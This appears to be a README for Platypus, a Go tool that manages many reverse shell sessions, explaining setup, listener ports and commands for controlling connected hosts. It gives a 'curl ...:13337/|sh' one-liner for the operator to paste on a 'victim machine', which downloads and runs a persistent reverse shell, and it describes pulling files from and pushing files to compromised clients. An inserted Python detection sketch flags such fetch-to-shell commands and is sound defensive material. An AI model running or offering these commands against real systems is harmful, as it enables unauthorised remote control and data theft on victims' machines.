A modern manager for multiple reverse shell sessions/clients, run from the terminal and written in Go.
There are multiple ways to run this tool; feel free to choose one of the following methods.

```bash
sudo apt install upx
git clone https://github.com/WangYihang/Platypus
cd Platypus
make
```

Download the Platypus prebuilt binary from HERE.

Run ./Platypus, then the config.yml will be generated automatically, and the config file is simple enough.
```yaml
servers:
  - host: "0.0.0.0"
    port: 13337
    # Platypus is able to use several properties as the unique identifier (primary key) of a single client.
    # All available properties are listed below:
    # `%i` IP
    # `%u` Username
    # `%m` MAC address
    # `%o` Operating System
    # `%t` Income TimeStamp
    hashFormat: "%i %u %m %o"
  - host: "0.0.0.0"
    port: 13338
    # Using TimeStamp allows us to track all connections from the same IP / Username / OS and MAC.
    hashFormat: "%i %u %m %o %t"
restful:
  host: "127.0.0.1"
  port: 7331
  enable: true
# Check new releases from GitHub when starting Platypus
update: false
```
As you can see, platypus will check for updates, then start listening on ports 13337, 13338 and 7331.
The three ports have different aims.
If you want another reverse shell listening port, just type Run 0.0.0.0 1339 or modify the
Also, platypus will print help information about RaaS, which releases you from remembering tedious reverse shell commands.
With platypus, all you have to do is copy and paste the curl command and execute it on the victim machine.
```bash
curl http://127.0.0.1:13337/|sh
curl http://192.168.88.129:13337/|sh
```
Now, suppose that the victim is attacked by the attacker and a reverse shell command is executed on the victim's machine.
Notice that the RaaS feature ensures that the reverse shell process runs in the background and ignores the hangup signal.
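From the defender's side, the one-liner above is a fetch piped straight into a shell, which is visible in process-execution logs. The following detection sketch is an added example, not part of the Platypus project; the `cmd=` log layout and the sample events are constructed assumptions, and it also covers `wget` and other shells beyond the `curl ... | sh` form shown on this page.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# A fetcher whose output is piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b(?P<args>[^|;&]*)\|\s*(?:sudo\s+)?(?:sh|bash|dash|zsh|ash)\b"
)
URL = re.compile(r"https?://[^\s'\"|]+")

# Constructed process-execution events; the "cmd=" field layout is an assumption.
SAMPLE_EVENTS = [
    "2024-05-01T10:00:01Z host=web01 user=www-data cmd=curl http://192.168.88.129:13337/|sh",
    "2024-05-01T10:02:10Z host=web01 user=deploy cmd=curl -fsSL https://example.org/pkg.tgz -o /tmp/pkg.tgz",
    "2024-05-01T10:03:44Z host=db02 user=root cmd=wget -qO- http://127.0.0.1:13337/ | bash",
    "2024-05-01T10:05:00Z host=db02 user=ops cmd=curl -s http://10.0.0.5:8080/health | jq .",
]

def inspect(cmdline):
    """Return details of a fetch-piped-to-shell command line, or None."""
    m = PIPE_TO_SHELL.search(cmdline)
    if not m:
        return None
    u = URL.search(m.group("args"))
    parts = urlsplit(u.group(0)) if u else None
    host = parts.hostname if parts else None
    try:
        ipaddress.ip_address(host or "")
        raw_ip = True
    except ValueError:
        raw_ip = False
    plaintext = parts is not None and parts.scheme == "http"
    return {
        "url": u.group(0) if u else None,
        "host": host,
        "port": parts.port if parts else None,
        # An unencrypted fetch from a bare IP address is the riskiest variant.
        "severity": "high" if (raw_ip and plaintext) else "medium",
    }

def scan(events):
    """Run inspect() over log lines and keep the event metadata with each hit."""
    hits = []
    for line in events:
        meta, _, cmd = line.partition(" cmd=")
        finding = inspect(cmd)
        if finding:
            hits.append({"event": meta, **finding})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Because the RaaS process detaches and ignores hangup, alerting on the initial command line is more reliable than looking for a child of the user's terminal afterwards.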
You can use the List command to print table-style information about all listening servers and connected clients. Notice that the port 13337 will reset the connection from the same machine (we consider two connections the same iff they share the same Hash value; the info being hashed can be configured in
13338 will not reset such connections, which provides more reliability.
The Jump command can take you on a tour between clients.
Use Jump [HASH / Alias] to jump.
Alias is an alias of a specific client; you can set an alias for a client via
Also, when jumping by HASH, you do not need to type the whole hash; a prefix of the hash will work.
All commands are case-insensitive; feel free to use Tab for completion.
Interact will pop up a shell, just like
Use the Download command to download a file from the reverse shell client to the attacker's machine.
Use the Upload command to upload a file to the client you are currently interacting with.
This feature only works on *nix clients.
For a better user experience, we highly RECOMMEND you use the Upgrade command to upgrade the plain reverse shell to an encrypted interactive shell.
Try to spawn /bin/bash via Python; the shell is then fully interactive (you can use vim, htop and other such tools).
Use Jump to select a client, then type PTY, then type Interact to drop into a fully interactive shell.
You can simply type exit to exit PTY mode; to avoid the situation in issue #39, you can use platyquit to quit the fully interactive shell mode.